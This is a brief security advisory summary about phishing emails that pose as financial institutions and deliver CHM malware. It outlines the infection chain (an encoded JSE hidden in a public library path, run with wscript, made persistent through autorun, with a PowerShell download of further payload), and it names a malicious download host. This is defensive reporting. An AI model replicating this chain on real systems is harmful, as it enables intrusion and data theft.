Hauri warns that phishing emails impersonating financial institutions were distributing CHM malware using finance-themed attachments such as product contracts, automatic insurance-payment notices, card-limit changes, and tax invoices. After extraction, the CHM package contains an HTML file and encoded Docs.jse; embedded script decodes the CHM, hides the JSE in a public library path, and launches it with wscript. The malware registers the JSE for autorun persistence and uses PowerShell to reach a malicious site and download an additional payload. The source identifies the download command targeting drimby.top/wndfi and detects the threat as HTML.S.CHMPhishing.